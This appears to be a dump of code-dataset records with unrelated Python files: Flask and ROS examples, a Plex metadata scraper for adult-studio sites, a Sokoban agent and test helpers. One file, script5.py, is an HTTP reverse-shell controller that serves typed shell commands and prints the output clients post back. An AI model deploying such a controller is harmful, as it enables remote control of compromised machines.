silent=True)\n\n##########################\n# Logger conf\n##########################\n\n# FLASKR_SETTINGS may point to a config file that overrides the configuration declared above\n\nlog_conf_path = os.path.join(app.root_path, \"./conf/logging.json\")\n# read log configuration\nif os.path.exists(log_conf_path):\n    with open(log_conf_path, 'rt') as f:\n        config = json.load(f)\n    logging.config.dictConfig(config)\n\n#\n# file_handler = RotatingFileHandler('./logs/foo.log', maxBytes=10000, backupCount=1)\n# file_handler.setLevel(logging.INFO)\n# file_handler.setFormatter(Formatter(\n#     '%(asctime)s %(levelname)s: %(message)s '\n#     '[in %(pathname)s:%(lineno)d]'\n# ))\n#\n# logger.addHandler(file_handler)\nlogger.info(\"!!!!!!!!!!!!!!!\")\nlogger.info(\"!!! 
started !!!\")\nlogger.info(\"!!!!!!!!!!!!!!!\")\n\n\n##########################\n# Swagger conf\n##########################\n\n\napi = Api(app, api_version='0.0', api_spec_url='/api/swagger')\napi.add_resource(ExempleResource, '/api/users/')\n# api.add_resource(SwaggerResource, '/api/swagger/')\n\nSWAGGER_URL = '/api/docs'\nAPI_URL = 'http://localhost:5000/api/swagger.json'\n\nswaggerui_blueprint = get_swaggerui_blueprint(\n SWAGGER_URL, # Swagger UI static files will be mapped to '{SWAGGER_URL}/dist/'\n API_URL,\n config={ # Swagger UI config overrides\n 'app_name': \"Super Test application override\"\n },\n)\n\napp.register_blueprint(swaggerui_blueprint, url_prefix=SWAGGER_URL)\n\n\ndef handle404(ctx):\n logger.error('404')\n return \"404\"\n\n\napp.register_error_handler(404, handle404)\n\n\n@app.teardown_appcontext\ndef close_db(error):\n \"\"\"Closes the database again at the end of the request.\"\"\"\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\n@app.cli.command('initdb')\ndef initdb_command():\n \"\"\"Initializes the database.\"\"\"\n db = Db()\n db.init_db()\n print('Initialized the database.')\n\n\n@app.route('/')\ndef show_entries():\n db = Db()\n ldb = db.get_db()\n cur = ldb.execute('select title, text from entries order by id desc')\n entries = cur.fetchall()\n return render_template('show_entries.html', entries=entries)\n\n\n@app.route('/add', methods=['POST'])\ndef add_entry():\n if not session.get('logged_in'):\n abort(401)\n db = Db()\n ldb = db.get_db()\n ldb.execute('insert into entries (title, text) values (?, ?)', [request.form['title'], request.form['text']])\n ldb.commit()\n flash('New entry was successfully posted')\n return redirect(url_for('show_entries'))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n print(url_for('show_entries'))\n error = None\n if request.method == 'POST':\n if request.form['username'] != app.config['USERNAME']:\n error = 'Invalid username'\n elif request.form['password'] != app.config['PASSWORD']:\n error = 'Invalid password'\n else:\n session['logged_in'] = True\n flash('You were logged in')\n return redirect(url_for('show_entries'))\n return render_template('login.html', error=error)\n\n\n@app.route('/logout')\ndef logout():\n session.pop('logged_in', None)\n flash('You were logged out')\n return redirect(url_for('show_entries'))\n\n\n@app.route('/rest/user/', methods=['GET', 'PUT'])\ndef show_user_profile(username):\n # show the user profile for that user\n if request.method == 'GET':\n return json.jsonify({'user': '%s' % username})\n else:\n return 'put'\n","sub_path":"flasktemplate/flasktemplate.py","file_name":"flasktemplate.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"191847955","text":"import PAsearchSites\nimport PAutils\n\n\ndef getAPIKey(siteNum):\n url = PAsearchSites.getSearchBaseURL(siteNum) + '/en/login'\n token_key = urlparse.urlparse(url).hostname\n\n token = None\n if token_key and token_key in Dict:\n data = Dict[token_key]\n data = base64.b64decode(data).decode('UTF-8')\n if 'validUntil=' in data:\n timestamp = int(data.split('validUntil=')[1].split('&')[0])\n if timestamp > time.time():\n token = Dict[token_key]\n\n if not token:\n req = PAutils.HTTPRequest(url)\n\n if not req.ok:\n url = PAsearchSites.getSearchBaseURL(siteNum) + '/en'\n req = PAutils.HTTPRequest(url)\n\n match = re.search(r'\\\"apiKey\\\":\\\"(.*?)\\\"', req.text)\n if match:\n token = match.group(1)\n\n if token_key 
and token:\n if token_key not in Dict or Dict[token_key] != token:\n Dict[token_key] = token\n Dict.Save()\n\n return token\n\n\ndef getAlgolia(url, indexName, params, referer):\n headers = {\n 'Content-Type': 'application/json',\n 'Referer': referer\n }\n params = json.dumps({'requests': [{'indexName': indexName, 'params': params}]})\n data = PAutils.HTTPRequest(url, headers=headers, params=params)\n data = data.json()\n\n return data['results'][0]['hits']\n\n\ndef search(results, lang, siteNum, searchData):\n searchData.title = searchData.encoded.replace('%20', ' ')\n sceneID = searchData.title.split(' ', 1)[0]\n if unicode(sceneID, 'UTF-8').isdigit():\n searchData.title = searchData.title.replace(sceneID, '', 1).strip()\n else:\n sceneID = None\n\n apiKEY = getAPIKey(siteNum)\n for sceneType in ['scenes', 'movies']:\n url = PAsearchSites.getSearchSearchURL(siteNum) + '?x-algolia-application-id=TSMKFA364Q&x-algolia-api-key=' + apiKEY\n if sceneID and not searchData.title:\n if sceneType == 'scenes':\n params = 'filters=clip_id=' + sceneID\n else:\n params = 'filters=movie_id=' + sceneID\n else:\n params = 'query=' + searchData.title\n\n searchResults = getAlgolia(url, 'all_' + sceneType, params, PAsearchSites.getSearchBaseURL(siteNum))\n for searchResult in searchResults:\n if sceneType == 'scenes':\n releaseDate = parse(searchResult['release_date'])\n curID = searchResult['clip_id']\n else:\n date = 'last_modified' if searchResult['last_modified'] else 'date_created'\n releaseDate = parse(searchResult[date])\n curID = searchResult['movie_id']\n\n titleNoFormatting = searchResult['title']\n releaseDate = releaseDate.strftime('%Y-%m-%d')\n\n if sceneID:\n score = 100 - Util.LevenshteinDistance(sceneID, curID)\n elif searchData.date:\n score = 100 - Util.LevenshteinDistance(searchData.date, releaseDate)\n else:\n score = 100 - Util.LevenshteinDistance(searchData.title.lower(), titleNoFormatting.lower())\n\n results.Append(MetadataSearchResult(id='%d|%d|%s|%s' % (curID, siteNum, sceneType, releaseDate), name='[%s] %s %s' % (sceneType.capitalize(), titleNoFormatting, releaseDate), score=score, lang=lang))\n\n return results\n\n\ndef update(metadata, lang, siteNum, movieGenres, movieActors, art):\n metadata_id = str(metadata.id).split('|')\n sceneID = int(metadata_id[0])\n sceneType = metadata_id[2]\n sceneIDName = 'clip_id' if sceneType == 'scenes' else 'movie_id'\n sceneDate = metadata_id[3]\n\n apiKEY = getAPIKey(siteNum)\n\n url = PAsearchSites.getSearchSearchURL(siteNum) + '?x-algolia-application-id=TSMKFA364Q&x-algolia-api-key=' + apiKEY\n data = getAlgolia(url, 'all_' + sceneType, 'filters=%s=%d' % (sceneIDName, sceneID), PAsearchSites.getSearchBaseURL(siteNum))\n detailsPageElements = data[0]\n\n data = getAlgolia(url, 'all_scenes', 'query=%s' % detailsPageElements['url_title'], PAsearchSites.getSearchBaseURL(siteNum))\n data = sorted(data, key=lambda i: i['clip_id'])\n scenesPagesElements = list(enumerate(data, 1))\n\n # Title\n title = None\n if sceneType == 'scenes' and len(scenesPagesElements) > 1:\n for idx, scene in scenesPagesElements:\n if scene['clip_id'] == sceneID:\n title = '%s, Scene %d' % (detailsPageElements['title'], idx)\n break\n if not title:\n title = detailsPageElements['title']\n\n metadata.title = title\n\n # Summary\n metadata.summary = detailsPageElements['description'].replace('
<br>', '\\n').replace('<br/>
', '\\n')\n\n # Studio\n if not detailsPageElements['network_name']:\n metadata.studio = detailsPageElements['studio_name']\n else:\n metadata.studio = detailsPageElements['network_name']\n\n # Tagline and Collection(s)\n metadata.collections.clear()\n for collectionName in ['studio_name', 'serie_name']:\n if collectionName in detailsPageElements:\n metadata.collections.add(detailsPageElements[collectionName])\n if (':' in detailsPageElements['title'] or '#' in detailsPageElements['title']) and len(scenesPagesElements) > 1:\n if 'movie_title' in detailsPageElements:\n metadata.collections.add(detailsPageElements['movie_title'])\n\n # Release Date\n date_object = parse(sceneDate)\n metadata.originally_available_at = date_object\n metadata.year = metadata.originally_available_at.year\n\n # Genres\n movieGenres.clearGenres()\n for genreLink in detailsPageElements['categories']:\n genreName = genreLink['name']\n if genreName:\n movieGenres.addGenre(genreName)\n\n if sceneType == 'movies':\n for idx, scene in scenesPagesElements:\n for genreLink in scene['categories']:\n genreName = genreLink['name']\n if genreName:\n movieGenres.addGenre(genreName)\n\n # Actors\n movieActors.clearActors()\n female = []\n male = []\n for actorLink in detailsPageElements['actors']:\n actorName = actorLink['name']\n\n actorData = getAlgolia(url, 'all_actors', 'filters=actor_id=' + actorLink['actor_id'], PAsearchSites.getSearchBaseURL(siteNum))[0]\n if 'pictures' in actorData and actorData['pictures']:\n max_quality = sorted(actorData['pictures'].keys())[-1]\n actorPhotoURL = 'https://images-fame.gammacdn.com/actors' + actorData['pictures'][max_quality]\n else:\n actorPhotoURL = ''\n\n if actorLink['gender'] == 'female':\n female.append((actorName, actorPhotoURL))\n else:\n male.append((actorName, actorPhotoURL))\n\n combined = female + male\n for actor in combined:\n movieActors.addActor(actor[0], actor[1])\n\n # Posters\n if not PAsearchSites.getSearchBaseURL(siteNum).endswith(('girlsway.com', 'puretaboo.com')):\n art.append('https://images-fame.gammacdn.com/movies/{0}/{0}_{1}_front_400x625.jpg'.format(detailsPageElements['movie_id'], detailsPageElements['url_title'].lower().replace('-', '_')))\n if 'url_movie_title' in detailsPageElements:\n art.append('https://images-fame.gammacdn.com/movies/{0}/{0}_{1}_front_400x625.jpg'.format(detailsPageElements['movie_id'], detailsPageElements['url_movie_title'].lower().replace('-', '_')))\n\n if 'pictures' in detailsPageElements and detailsPageElements['pictures']:\n max_quality = detailsPageElements['pictures']['nsfw']['top'].keys()[0]\n pictureURL = 'https://images-fame.gammacdn.com/movies/' + detailsPageElements['pictures'][max_quality]\n\n if sceneType == 'movies':\n art.append(pictureURL)\n else:\n art.insert(0, pictureURL)\n\n Log('Artwork found: %d' % len(art))\n for idx, posterUrl in enumerate(art, 1):\n if not PAsearchSites.posterAlreadyExists(posterUrl, metadata):\n # Download image file for analysis\n try:\n image = PAutils.HTTPRequest(posterUrl)\n im = StringIO(image.content)\n resized_image = Image.open(im)\n width, height = resized_image.size\n # Add the image proxy items to the collection\n if width > 1:\n # Item is a poster\n metadata.posters[posterUrl] = Proxy.Media(image.content, sort_order=idx)\n if width > 100 and width > height:\n # Item is an art item\n metadata.art[posterUrl] = Proxy.Media(image.content, sort_order=idx)\n except:\n pass\n\n return 
metadata\n","sub_path":"Contents/Code/networkGammaEntOther.py","file_name":"networkGammaEntOther.py","file_ext":"py","file_size_in_byte":8654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"631944895","text":"import json\nimport nibabel as nib\nimport numpy as np\nimport sys\nimport os\n\ndef print_volume(roi,img,voxel_vol):\n\tmask= img == int(roi['label']) \n\tmasked_cc = np.ma.array(img, mask=np.logical_not(mask),fill_value = 0)\n\tvol=len(masked_cc.compressed())*voxel_vol\n\tprint(\"volume:\",vol,\" mm3 for label\",roi['label'])\n\treturn vol\n\nlabel_vol_path=sys.argv[1]\nlabel=sys.argv[2]\nicc = int(sys.argv[3])\n\ntry:\n\tos.mkdir(\"output\")\nexcept:\n\tpass\n\nlut=[]\nmeas=[]\n\n# Load mask\ncc_parc_img = nib.load(label_vol_path)\ncc_parc_data = cc_parc_img.get_data()\n# Arrange the array to be in RAS+ space\nornt=nib.orientations.axcodes2ornt(nib.aff2axcodes(cc_parc_img.affine))\ncc_parc_data=nib.orientations.apply_orientation(cc_parc_data, ornt)\n\nvxl_size=cc_parc_img.get_header().get_zooms()\n\nroi = {}\nroi[\"label\"]=label\n\nmeas = print_volume(roi,cc_parc_data,vxl_size[0]*vxl_size[1]*vxl_size[2])\n\nwith open('/output/measurement.json', 'w') as f:\n\tjson.dump(meas,f,indent=4, separators=(',', ': '))\n\nwith open('/output/measurement2.json', 'w') as f:\n json.dump(meas/icc,f,indent=4, separators=(',', ': '))\n\nwith open('/output/measurement3.json', 'w') as f:\n json.dump((meas/5)/icc,f,indent=4, separators=(',', ': '))\n\nwith open('/output/measurement4.json', 'w') as f:\n json.dump(meas/5,f,indent=4, separators=(',', ': '))\n\n","sub_path":"src/pydra_volume_test.py","file_name":"pydra_volume_test.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"489135301","text":"import threading\nimport time\n\n\ndef some_job(name: str):\n time.sleep(1) # our work done here\n print(name)\n\n\nname_tmpl = 'Thread {}'\nthreads = []\nMAX = 4\n\nfor i in range(MAX):\n name = name_tmpl.format(i)\n t = threading.Thread(target=some_job, args=(name, ))\n threads.append(t)\n\nfor t in threads: # may be in a previous loop\n t.start()\n\nfor t in threads:\n t.join()\n","sub_path":"examples/01_threading.py","file_name":"01_threading.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"635767243","text":"#!/usr/bin/env python\nimport rospy\nfrom cv_bridge import CvBridge, CvBridgeError\nimport cv2\nimport utils\nfrom basics.msg import Images\n\nclass Image_Subscriber(object):\n\n\n\tdef __init__(self):\n\t\tself.bridge = CvBridge()\n\n\tdef spin(self):\n\t\trospy.init_node('listener', anonymous=True)\n\t\trospy.Subscriber(\"imagesAndPixelsum\", Images, self.show_message)\n\t\trospy.spin()\t\t\t\n\n\tdef show_image(self, image, window, type='bgr8'):\n\t\tcv_image = utils.convert_image_ros_to_cv(\n\t\t\t\t\tself.bridge, image, type)\n\t\tcv2.imshow(window, cv_image)\n\n\n\tdef show_message(self, msg):\n\t\tself.show_image(msg.rgb, 'RGB')\n\t\tself.show_image(msg.grayscale, 'grayscale' ,'8UC1')\n\t\trospy.loginfo(msg.numberofpixels)\n\t\tcv2.waitKey(1)\n\nif __name__ == \"__main__\":\n\tsub = Image_Subscriber()\n\tsub.spin()","sub_path":"Assignment1/report/src/3/scripts/image_subscriber.py","file_name":"image_subscriber.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"577055632","text":"from loader import load_input\nfrom .common import single_differing_index\nimport os\n\n\ndef run():\n lines = load_input(os.path.join(os.path.dirname(__file__), 'input.txt'))\n for i in range(0, len(lines)):\n a = lines[i].strip()\n for b in lines[i+1:]:\n b = b.strip()\n index = single_differing_index(a, b)\n if index is not False:\n return 'Index: %d, A letter: %s, B letter: %s, A: %s, B: %s' % (index, a[index], b[index], a, b)\n\n return 'Nothing :('\n","sub_path":"day02/part02.py","file_name":"part02.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"637048766","text":"[H,P] = [int(x) for x in input().split()]\r\nE = list(range(H))\r\nE.reverse()\r\nC = []\r\nD = []\r\n \r\ndef move(n, source, target, idle, steps):\r\n if n>0:\r\n steps = move(n-1, source, idle, target, steps)\r\n if steps <= 0:\r\n return steps\r\n \r\n \r\n steps -= 1\r\n target.append(source.pop())\r\n if steps <= 0:\r\n return steps\r\n \r\n \r\n steps = move(n-1,idle, target, source, steps)\r\n if steps <= 0:\r\n return steps\r\n \r\n return steps\r\n \r\nmove(H, E, D, C, P)\r\nprint (\"%i %i %i\" %(len(E), len(C), len (D)))\r\n \r\n","sub_path":"Lista 6 E.py","file_name":"Lista 6 E.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"323373046","text":"import http.server\nimport os\nimport cgi\n\nHOST_NAME = \"192.168.42.85\"\nPORT_NUMBER = 8080\nclass MyHandler(http.server.BaseHTTPRequestHandler):\n def do_GET(self):\n command = input(\"shell> \")\n self.send_response(200)\n self.send_header(\"Content-type\",\"text/html\")\n self.end_headers()\n self.wfile.write(command.encode())\n \n def do_POST(self):\n self.send_response(200)\n self.end_headers()\n length = int(self.headers['Content-length']) \n postVar = self.rfile.read(length)\n print(postVar.decode())\n\nif __name__ == \"__main__\":\n server_class = http.server.HTTPServer\n httpd = server_class((HOST_NAME,PORT_NUMBER),MyHandler)\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n print(\"server is terminated\")\n httpd.server_close()\n","sub_path":"script5.py","file_name":"script5.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"592162433","text":"from bppy import *\nimport itertools\nfrom q_learning import *\nimport pygame\nimport time\nfrom bp_env import BPEnv\n#from bp_env_goal import BPGoalEnv\n\n\nmust_finish = \"must_finish\"\nstate = \"state\"\npygame_settings = {\n \"display\": False\n}\nmap_settings = {}\n\n\ndef action_to_new_location(action, i, j):\n if action == \"Up\":\n return i - 1, j\n if action == \"Down\":\n return i + 1, j\n if action == \"Left\":\n return i, j - 1\n if action == \"Right\":\n return i, j + 1\n\n\ndef event_to_new_location(event):\n return action_to_new_location(action=event.name, **event.data)\n\n\ndef event_to_2_steps_trajectory(event):\n i, j = event_to_new_location(event)\n return event_to_new_location(BEvent(event.name, {\"i\": i, \"j\": j}))\n\n\ndef new_location_to_events(i, j):\n return [BEvent(\"Up\", {\"i\": i+1, \"j\": j}),\n BEvent(\"Down\", {\"i\": i-1, \"j\": j}),\n BEvent(\"Left\", {\"i\": i, \"j\": j+1}),\n BEvent(\"Right\", {\"i\": i, \"j\": j-1})]\n\n\ndef is_adjacent(l1, l2):\n terms = list()\n terms.append(l1[0] == l2[0] and l1[1] == l2[1]+1)\n terms.append(l1[0] == l2[0] and 
l1[1] == l2[1]-1)\n terms.append(l1[0] == l2[0]+1 and l1[1] == l2[1])\n terms.append(l1[0] == l2[0]-1 and l1[1] == l2[1])\n return sum(terms) == 1\n\n\ndef find_adjacent_objects(list_1, list_2):\n return [(l1, l2) for l1 in list_1 for l2 in list_2 if is_adjacent(l1, l2)]\n\ndef find_adjacent_boxes(location, l):\n return [(location, l2) for l2 in l if is_adjacent(location, l2)]\n\n\ndef block_action(neighbors_list):\n def predicate(event):\n p1 = event_to_new_location(event)\n p2 = event_to_2_steps_trajectory(event)\n return (p1, p2) in neighbors_list or (p2, p1) in neighbors_list\n return predicate\n\n\n@b_thread\ndef player(i, j):\n directions = [\"Up\", \"Down\", \"Left\", \"Right\"]\n while True:\n e = yield {request: [BEvent(d, {\"i\": i, \"j\": j}) for d in directions], state: str(i)+\"_\"+str(j)}\n i, j = event_to_new_location(e)\n\n@b_thread\ndef wall():\n global walls_list\n block_list = list(itertools.chain(*[new_location_to_events(i, j) for i, j in walls_list])) # use event_to_new_location(e)\n yield {block: block_list}\n\n@b_thread\ndef boxes():\n global box_list, walls_list, target_list\n while True:\n neighbors_list = find_adjacent_objects(box_list, walls_list) + \\\n find_adjacent_objects(box_list, box_list)\n double_object_movement = EventSet(block_action(neighbors_list))\n box_list_state = \"_\".join([str(i) for b in box_list for i in b])\n all_targets_full = sorted(box_list) == sorted(target_list)\n e = yield {block: double_object_movement, waitFor: All(), state: box_list_state, must_finish: not all_targets_full}\n new_player_location = event_to_new_location(e)\n if new_player_location in box_list:\n new_box_location = event_to_2_steps_trajectory(e)\n box_list.remove(new_player_location)\n box_list.append(new_box_location)\n\n@b_thread\ndef box(i, j):\n global box_list, walls_list, target_list\n while True:\n neighbors_list = find_adjacent_boxes((i, j), walls_list) + \\\n find_adjacent_boxes((i, j), box_list)\n double_object_movement = EventSet(block_action(neighbors_list))\n box_state = str(i) + \"_\" + str(j)\n box_in_target = (i, j) in target_list\n e = yield {block: double_object_movement, waitFor: All(), state: box_state,\n must_finish: not box_in_target}\n new_player_location = event_to_new_location(e)\n if new_player_location == (i, j):\n new_box_location = event_to_2_steps_trajectory(e)\n box_list.remove(new_player_location)\n box_list.append(new_box_location)\n i, j = new_box_location\n\n\n@b_thread\ndef map_printer(map):\n if pygame_settings[\"display\"]:\n\n main_surface = pygame.display.set_mode((32 * len(map[0]), 32 * len(map)))\n count = 0\n while True:\n # Look for an event from keyboard, mouse, joystick, etc.\n ev = pygame.event.poll()\n if ev.type == pygame.QUIT: # Window close button clicked?\n break\n # Completely redraw the surface, starting with background\n main_surface.fill((255, 255, 255))\n for i in range(len(map)):\n for j in range(len(map[i])):\n # Copy our image to the surface, at this (x,y) posn\n main_surface.blit(map_dict[map[i][j]], (j * 32, i * 32))\n # Now that everything is drawn, put it on display!\n pygame.display.flip()\n time.sleep(0.5)\n #print(count)\n count += 1\n\n e = yield {waitFor: All()}\n\n map = \",\".join(map).replace(\"a\", \" \").split(\",\")\n map = \",\".join(map).replace(\"A\", \"t\").split(\",\")\n i, j = event_to_new_location(e)\n if map[i][j] == \"b\" or map[i][j] == \"B\":\n i2, j2 = event_to_2_steps_trajectory(e)\n if map[i2][j2] == \"t\":\n map[i2] = map[i2][:j2] + \"B\" + map[i2][j2 + 1:]\n else:\n map[i2] = 
map[i2][:j2] + \"b\" + map[i2][j2 + 1:]\n if map[i][j] == \"b\":\n map[i] = map[i][:j] + \"a\" + map[i][j+1:]\n else:\n map[i] = map[i][:j] + \"A\" + map[i][j + 1:]\n elif map[i][j] == \"t\":\n map[i] = map[i][:j] + \"A\" + map[i][j + 1:]\n else:\n map[i] = map[i][:j] + \"a\" + map[i][j + 1:]\n else:\n yield {waitFor: All()}\n\n\n# run\ndef find(map, ch):\n return [(i, j) for i, row in enumerate(map) for j, c in enumerate(row) if c == ch]\n\n\nwalls_list = []\nbox_list = []\ntarget_list = []\n\n\n\nmap_dict = {\n \" \": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/floor.png\"), (32,32)),\n \"X\": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/wall.png\"), (32,32)),\n \"b\": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/box.png\"), (32,32)),\n \"B\": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/box_on_target.png\"), (32,32)),\n \"a\": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/player.png\"), (32,32)),\n \"A\": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/player_on_target.png\"), (32,32)),\n \"t\": pygame.transform.scale(pygame.image.load(\"sokoban_pygame/box_target.png\"), (32,32))\n}\n\n\ndef init_bprogram():\n global walls_list, box_list, target_list\n map = map_settings[\"map\"]\n walls_list = find(map, \"X\")\n box_list = find(map, \"b\") + find(map, \"B\")\n empty_target_list = find(map, \"t\") + find(map, \"A\")\n full_target_list = find(map, \"B\")\n target_list = empty_target_list + full_target_list\n player_locations = find(map, \"a\") + find(map, \"A\")\n player_location = player_locations[0]\n\n bthreads_list = [player(*player_location), wall(), map_printer(map)] + [box(*l) for l in box_list]\n return BProgram(bthreads=bthreads_list, event_selection_strategy=SimpleEventSelectionStrategy())\n\n\nfrom bp_env import BPEnv\nimport random\nfrom gym import spaces\nfrom bp_action_space import BPActionSpace\n\n\ndef gym_env_generator(episode_timeout):\n global walls_list, box_list, target_list\n _ = init_bprogram()\n env = BPEnv()\n env.set_bprogram_generator(init_bprogram)\n action_mapper = {0: \"Up\", 1: \"Down\", 2: \"Left\", 3: \"Right\"}\n env.action_mapper = action_mapper\n env.action_space = spaces.Discrete(action_mapper.__len__())\n env.observation_space = spaces.MultiDiscrete([max(len(map), len(map[0])) for _ in 2*box_list + 2*[0]])\n env.episode_timeout = episode_timeout\n return env\n\ndef gym_goal_env_generator(episode_timeout):\n global walls_list, box_list, target_list\n _ = init_bprogram()\n env = BPGoalEnv()\n env.set_bprogram_generator(init_bprogram)\n action_mapper = {0: \"Up\", 1: \"Down\", 2: \"Left\", 3: \"Right\"}\n env.action_mapper = action_mapper\n env.action_space = spaces.Discrete(action_mapper.__len__())\n env.observation_space = spaces.Dict({\n 'observation': spaces.MultiDiscrete([max(len(map), len(map[0])) for _ in 2*box_list + 2*[0]]),\n 'achieved_goal': spaces.MultiDiscrete([max(len(map), len(map[0])) for _ in 2*box_list + 2*[0]]),\n 'desired_goal': spaces.MultiDiscrete([max(len(map), len(map[0])) for _ in 2*box_list + 2*[0]])\n })\n env.episode_timeout = episode_timeout\n return env\n\n","sub_path":"sokoban.py","file_name":"sokoban.py","file_ext":"py","file_size_in_byte":8488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99681660","text":"puntuaction = {'.',',','!','?',' '}\ndef palindrome(s):\n i,j=0,len(s)-1\n while i < j:\n #ignore puntuactions\n while i$ = {avgT:.2f} K')\nax.set_xlabel('Time, 
(ps)')\nax.set_ylabel(r'$T$, (K)')\nax.legend(loc='upper right')\nax.grid()\nplt.tight_layout()\nplt.savefig('task1_T_traj.png')\nplt.show()","sub_path":"computational_materials_and_molecular_physics/HW3/task1/plt_task1.py","file_name":"plt_task1.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"187184264","text":"# regression to identify the trend\nimport statsmodels.api as sm\nfrom statsmodels.regression.rolling import RollingOLS\nfrom main import pd\nimport os\n\ndef strategy(df, symbol):\n x = sm.add_constant(df.index)\n df['tp'] = (df['High'] + df['Low'] + df['Close']) / 3\n y = df['tp']\n window = 12 * 2\n rols = RollingOLS(y, x, window=window)\n rres = rols.fit()\n\n params = rres.params\n params.columns = [f\"const_{window}\", f\"beta_{window}\"]\n\n rsquared = rres.rsquared\n rsquared.name = f'r2_{window}'\n\n df = pd.concat([df, params, rsquared], axis=1)\n\n df['buy_significance'] = df[f'r2_{window}'] > 0.7\n df['buy_beta'] = df[f'beta_{window}'] < 0\n df['buy_signal'] = df['buy_beta'] & df['buy_significance']\n\n window = 12\n rols = RollingOLS(y, x, window=window)\n rres = rols.fit()\n\n params = rres.params\n params.columns=[f\"const_{window}\", f\"beta_{window}\"]\n\n rsquared = rres.rsquared\n rsquared.name = f'r2_{window}'\n\n df = pd.concat([df, params, rsquared], axis=1)\n\n df['sell_significance'] = df[f'r2_{window}'] > 0.7\n df['sell_beta'] = df[f'beta_{window}'] > 0\n df['sell_signal'] = df['sell_beta'] & df['sell_significance']\n\n df = df.drop(df[(df.buy_signal == False) & (df.sell_signal == False)].index)\n\n file_count = 0\n if os.path.isfile(f\"back_test_data/{symbol}({file_count}).csv\"):\n file_count += 1\n\n df.to_csv(f\"back_test_data/{symbol}({file_count}).csv\", index=False)\n return df","sub_path":"strategy_05.py","file_name":"strategy_05.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"438081370","text":"import json\nimport unittest\nfrom app import app\nfrom ..user.models import User\nfrom ..store.store import store\n\nclass BaseAPITestSetUp (unittest.TestCase):\n def setUp(self):\n self.helper = TestHelper(app.test_client())\n store.init_db()\n default_admin = {\n 'username': 'admin',\n 'password': 'admin_pass',\n 'role': 'admin'\n }\n user = User(default_admin)\n store.add(user)\n\n def tearDown(self):\n store.drop_db()\n\n\n\nclass TestHelper():\n def __init__(self, test_client):\n self.base_url = 'http://127.0.0.1:8080'\n self.headers = {'content-type': 'application/json'}\n self.client = test_client\n\n def authenticate (self, login_data):\n url = f'{self.base_url}/users/auth'\n res = self.client.post(url, data=json.dumps(login_data), headers=self.headers)\n # return the token\n return json.loads(res.data.decode('utf8'))['token']\n\n def add_user (self, user_data, token):\n url = f'{self.base_url}/users'\n return self.client.post(\n url,\n data=json.dumps(user_data),\n headers={ **self.headers, 'token': token }\n )\n\n def add_product (self, product_data, token):\n url = f'{self.base_url}/products'\n return self.client.post(\n url,\n data=json.dumps(product_data),\n headers={ **self.headers, 'token': token }\n )\n\n def get_products (self, token):\n url = f'{self.base_url}/products'\n return self.client.get(url, headers={ **self.headers, 'token': token 
})\n","sub_path":"app/shared/base_test.py","file_name":"base_test.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"207274447","text":"import logging\nimport os\nfrom sqlalchemy import Column, ForeignKey, Integer, String, DateTime, Boolean\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport sqlite3\nfrom dateutil.parser import parse\n\nBase = declarative_base()\n\nclass BundleId(Base):\n __tablename__ = 'bundle_ids'\n id = Column(Integer, primary_key=True)\n native_id = Column(String(250))\n\nclass App(Base):\n __tablename__ = 'apps'\n id = Column(Integer, primary_key=True)\n title = Column(String(250))\n bundle_id = Column(String(250), ForeignKey('bundle_ids.id'), sqlite_on_conflict_unique='IGNORE')\n url = Column(String(250))\n developer = Column(String(250))\n genre = Column(String(250))\n content_rating = Column(String(250))\n content_rating_description = Column(String(250))\n contains_ads = Column(Boolean)\n installs = Column(String(250))\n privacy_policy = Column(String(250))\n\nclass Review(Base):\n __tablename__ = 'reviews'\n id = Column(Integer, primary_key=True)\n app_id = Column(Integer, ForeignKey('apps.id'))\n content = Column(String(500))\n review_native_id = Column(String(500), sqlite_on_conflict_unique='IGNORE')\n created_at = Column(DateTime)\n score = Column(Integer)\n reply_content = Column(String(500))\n\ndef init():\n engine = create_engine('sqlite:///combined.db')\n Base.metadata.create_all(engine)\n\n Base.metadata.bind = engine\n\n DBSession = sessionmaker(bind=engine)\n session = DBSession()\n return session\n\n\ndef create_connection(db_file):\n \"\"\" create a database connection to the SQLite database\n specified by the db_file\n :param db_file: database file\n :return: Connection object or None\n \"\"\"\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Exception as e:\n print(e)\n\n return conn\n\ndef select_all(conn,session):\n \"\"\"\n Query all rows in the tasks table\n :param conn: the Connection object\n :return:\n \"\"\"\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM apps\")\n apps = 